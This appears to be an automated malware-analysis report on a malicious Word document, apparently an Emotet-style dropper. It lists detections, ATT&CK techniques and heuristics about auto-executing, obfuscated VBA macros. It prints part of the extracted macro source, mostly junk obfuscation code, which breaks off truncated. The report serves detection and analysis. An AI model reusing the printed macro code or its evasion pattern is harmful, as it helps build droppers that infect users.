MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is an Office document containing heavily obfuscated VBA macros. Heuristics indicate the presence of auto-executing macros (Document_Open) that utilize Shell() and CreateObject calls, typical for downloading and executing further malicious content. The ClamAV detection name 'Doc.Dropper.Emodldr-6755244-0' further supports its role as a dropper.
Heuristics 9
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 188759 bytes |
SHA-256: fdfc570fe2daaf5c5fb9712d0cbe384363c570ce257a821dbecc9246ca08aefd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function iqEZtDe(fvsnelEd As String) As String
kewVP = 630 - 1198 - 1943
For SxbWwN = 0 To 6
bDEQCuqr = Right("e-hRHM^f.jC?!_", 3)
HZxhNF = StrReverse("JV)r*[Ez*IPv_kYF&")
TqXpA = RTrim("u-Qxe.&^VYp.jlR_B")
HZxhNF = Space(16)
eSNfgBwRDUE = RTrim("XPIc]-t(YN&V-ml!")
Next SxbWwN
NAMeaCp = Left("Yy-]xIsmqkqHHEGjK(@", 5)
eSNfgBwRDUE = 1536 + 1080 + 1162
bDEQCuqr = 1435 + 1930 + 994
YxjxBnmxvj = UCase("a?CsXhYb]eJ)P")
While fGpAuI < 3
WFVSiLOGiz = RTrim("$hx&d)F]M?-EWC?_er")
UZLDSE = Space(10)
kewVP = "ZcH%N%jPtwj)$T" + "x!FYmKKp$*GW" + "F_Nh)b#NISwXO$bB"
iwgMvUchTxsU = LTrim("bpcPo(XD-H_Z")
KrtlNclOmAoo = 1620 - 1310 - 1426
zMGhAR = LTrim("Yc?YfJEvLFj)_xXcuzTe")
NAMeaCp = Right("ej$Ch!KLL.@(gfXI yIQ", 5)
kewVP = Space(17)
zOQeZCRu = RTrim("]?TeaQ[z(xR")
fGpAuI = fGpAuI + 3
Wend
Dim INaVhhYZ() As Byte
KrtlNclOmAoo = "&CpB*T-uB@]*Uxw" + "HdnX!yD*@_eseBGSg)H" + "^NdfJdJQ%.Oh!"
For bSLkwR = 0 To 9
EcfidI = RTrim("eSehLd^slB")
UZLDSE = 1040 - 1548 - 1296
HZxhNF = 917 - 1954 - 1873
bWLduzAeZLW = "TZ[.AeF#CP&BD!b&" + "HEG#njZJ^AZ@EEH" + "k^a.YcjB]R#SfP"
zMGhAR = StrReverse("#ugWd.hzqPsgim xDB")
TqXpA = "D^M*FoyU#OAwm[bwhx]s" + "LFrERUbUgyUOlcPC" + "wCjEl do.o_eRGM.[y"
zOQeZCRu = RTrim("Hf@LjPLrcaFm")
Next bSLkwR
For QMcAZz = 0 To 2
While wzGQev < 3
zOQeZCRu = RTrim("lOHhoDvaqujxpbs")
bWLduzAeZLW = LTrim("GqU?(lj-jChB#b%cgQRs")
Ilfqa = "hGU -JIJ !xh[xG)VqQ" + "#sJ?UyY[pzZ" + "mF[.yfN_Ou^RzHs"
bDEQCuqr = StrReverse("n^I]WmEEampMrsnh")
NAMeaCp = UCase("CNL)g)Wn _")
WFVSiLOGiz = Right("uXQXHLWoT]", 4)
Ilfqa = 893 + 1887 + 1636
TqXpA = LTrim("S%qVBsqDWl(w#")
kewVP = UCase("WycA^aWvtQDR^%(ATox@")
wzGQev = wzGQev + 2
Wend
aESTZiwniR = "D-aPBlpotN]yk]kiN" + "cR%xpddKXIkVaJ*" + "pdAtY]zq.$yr]b"
PUobpfmGH = 824 + 184 + 864
PUobpfmGH = StrReverse("pINX(WCPbUDt[uqwMGR")
aESTZiwniR = Left("thQ.PYLCNN.NayqokE", 2)
WFVSiLOGiz = Space(16)
bDEQCuqr = RTrim("vDJFP-A^w!-lqM#")
WFVSiLOGiz = 666 + 1120 + 139
PUobpfmGH = RTrim("m*Zr&Ap$Wme ")
PUobpfmGH = "!JkKiQRG!_UM" + "!Ip*vvJH]." + "kUOp*W]@VFQ-Ji%$$"
zMGhAR = 947 + 1623 + 1217
Next QMcAZz
For oFucHF = 0 To 6
YxjxBnmxvj = 1198 - 615 - 1571
zMGhAR = RTrim(")nL-(zHX]XRSW%EFL")
zMGhAR = LTrim("QcuRpdbCPs?KVkYoh")
WFVSiLOGiz = LTrim("f)TCdmyB-h")
EcfidI = 268 - 575 - 790
Ilfqa = UCase("rJf@VFoWM#RO yD$$bAU")
KrtlNclOmAoo = RTrim("RuuOPUgOJyL")
Ilfqa = 1134 + 1620 + 798
Next oFucHF
PUobpfmGH = 1936 + 508 + 1098
For ZWCOai = 0 To 9
TqXpA = Left("l.QNCdKuKqJl ^!eX", 5)
kewVP = UCase(")@. &@Elhr^qHDS]Y_@")
Next ZWCOai
For aVgYmI = 0 To 9
eSNfgBwRDUE = Space(2)
iwgMvUchTxsU = Right("aunoiGHuezVPAgE%", 5)
KrtlNclOmAoo = StrReverse("zsHtiyZRpb_JEl")
WFVSiLOGiz = LTrim("VZ#_gzlmaacES@")
bWLduzAeZLW = LTrim(" _x!!y[DZV(")
HZxhNF = Right("vjPAFfkDmq?bzACa]Y(", 4)
iwgMvUchTxsU = Space(18)
Next aVgYmI
TqXpA = UCase("ezm[$dVj_Jk.f")
Dim YUljnw As Integer
NAMeaCp = Right("].DA-mobum", 4)
UZLDSE = Right("dfXxI.mMhKF@QHkr[", 4)
While qnTwWW < 4
WFVSiLOGiz = Right("Qz@nuSRNgcZic%f", 2)
EcfidI = UCase("QLhi]Z$#iQ!ZvjuSq.Z")
eSNfgBwRDUE = StrReverse("NJWu@tGuWk^[h)x[Q !n")
bWLduzAeZLW = LTrim("bqa$iCP?Y$^")
eSNfgBwRDUE = Right("nLvnOP?_X#rpj-EOPZ", 3)
UZLDSE = 733
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.